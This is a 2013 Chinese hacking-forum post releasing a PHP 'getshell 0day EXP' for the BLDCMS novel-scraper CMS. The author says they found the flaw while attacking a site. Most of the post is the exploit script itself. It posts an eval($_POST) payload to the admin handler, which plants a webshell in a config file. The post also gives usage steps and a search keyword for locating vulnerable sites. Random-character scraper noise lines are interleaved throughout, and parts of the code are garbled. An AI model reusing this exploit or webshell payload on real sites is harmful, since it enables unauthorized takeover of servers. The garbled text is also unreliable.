中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
9 F! g @3 k+ x5 w0 `' v' p8 d: A R
3 }7 k# Q2 v0 i+ v" @
1 ~( u+ n% D k( ~7 }+ f. ]4 g& a
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
* b; S( i: c9 D& `: k' g) a, a. ^9 M
6 j2 s) ]# D$ Z! I
既然都有人发了 我就把我之前写好的EXP放出来吧
2 ~2 b6 m7 H9 X6 n# f8 K4 h
* v% n/ t/ k5 H ^
view source print?01.php;">
7 j8 l s( W2 R
02.<!--?php
! Y# T: t2 M: M I
03.echo "-------------------------------------------------------------------
' H: ]' C' P% G; B+ j
04.
5 i _3 S4 J2 M8 n: ?4 F
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
) _( q+ q: @3 _& u. L2 K0 t3 }* Z
06.
- F ~5 ?; A6 s# e1 M) B$ C5 c% _
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
" T5 l, I) Z" _, F
08.
: E( w2 i) Q- P
09.QQ:981009941\r\n 2013.3.21\r\n
4 C+ p F4 u2 l% H: b! u
10.
+ {3 D/ B7 K4 Y! M2 H' T
11.
$ ]. [! M* L t# K6 ~% k; h
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
n% B! F& P0 \
13.
6 M) e$ M- ~" ]( T8 w
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 z V0 J6 b/ [4 V" S2 f: i
15.
( p; f' E; o, t
16.--------------------------------------------------------------------\r\n";
, w4 O; m. c# J' w6 Y+ @
17.$url=$argv[1];
' j' E& |" I4 F: b/ C9 s! A# O, a0 h
18.$dir=$argv[2];
) G# w4 d5 r) B) ?+ w% [& ], Y: t. H
19.$pass=$argv[3];
) w/ f( ~7 Z+ Z* P; B
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
! U0 C. I, p+ A0 o/ s! s j
21.if (emptyempty($pass)||emptyempty($url))
; x* S- K8 J, m) c2 j( y2 ]- n
22.{exit("请输入参数");}
% x9 `9 {6 p6 v8 D" m. s$ n
23.else
( t& L. L, h$ v* x& g# [ @
24.{
( w( i6 l1 ~: @7 g I
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
" V: }. ?6 B* r7 Z" g
26.
' ?. c9 J0 ~' g
27.al;
7 m' }; P5 D+ P5 e8 O, M+ P
28.$length = strlen($fuckdata);
4 C0 \, G, y0 h7 Y
29.function getshell($url,$pass)
6 \8 ]! j/ U+ Y9 |9 l
30.{
3 P6 G; L0 _0 I+ y4 @# \+ j
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
* W0 e# p* @4 W; y7 k
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
6 j& v7 F$ B1 C. l; O8 |# V
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
) V3 @5 S$ ~6 j! U* c
34.$header .= "User-Agent: MSIE\r\n";
% p# w6 y% g5 p: m- f2 ^; m
35.$header .= "Host:".$url."\r\n";
+ \+ q- s" n5 F$ z5 D! C
36.$header .= "Content-Length: ".$length."\r\n";
+ ?3 ?( j$ ~7 p3 W" n+ C( O
37.$header .= "Connection: Close\r\n";
" }4 c1 c9 Q' F
38.$header .="\r\n";
7 ~1 B1 c4 V/ l8 n) y1 F
39.$header .= $fuckdata."\r\n\r\n";
! B8 _, q, I6 y) L& y
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
9 o; f7 R( {% L9 I
41.if (!$fp)
& L9 Q; v0 \8 J. H
42.{
1 ]) D2 c4 o2 H
43.exit ("利用失败:请检查指定目标是否能正常打开");
% _& A3 Z9 [3 p' |9 b* b
44.}
`: Y5 ?& q. V$ o5 @* @# y9 T
45.else{ if (!fputs($fp,$header))
! ]6 Z9 ]4 g0 B) Z/ q
46.{exit ("利用失败");}
9 a6 p2 R6 U1 |
47.else
! L) c* T$ O1 a+ w
48.{
2 e- M$ R8 Y! U9 ~9 ^+ H
49.$receive = '';
$ Z: |! w& c7 c9 z& |8 a: }
50.while (!feof($fp)) {
, p& }" r3 f1 `5 ^
51.$receive .= @fgets($fp, 1000);
6 G2 R# P& N. D$ h, w, T. @3 l
52.}
) t0 B3 V9 n- x3 D* q1 v4 B0 k- t
53.@fclose($fp);
% L# J( \' {& _1 y1 r4 l
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
7 e8 ]$ v" d' b' \. I* c4 _5 F+ l5 i
55.
1 {( b" \+ l9 q5 v/ S
56.GPC是否=off)";
1 z, Y$ k0 ?# P# l. s c
57.}}
( Y* f4 ^ I! }9 J( H) R% _" p! S
58.}
) g) m$ l6 ^. ?" V
59.}
. _! c4 H1 ~* z- x+ x. U5 y3 d6 V
60.getshell($url,$pass);
% p, M- v$ r: v, E
61.?-->
1 Z2 Q$ P. ?( P
/ D, `+ t n0 i6 M! V' @
- b7 Q- `! } B) d1 t* q
0 Y( [2 o' D; R( ~* _* t+ H
by 数据流
1 w: {1 Z. m' ?* s* n# ?2 G& T2 [) e0 r
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2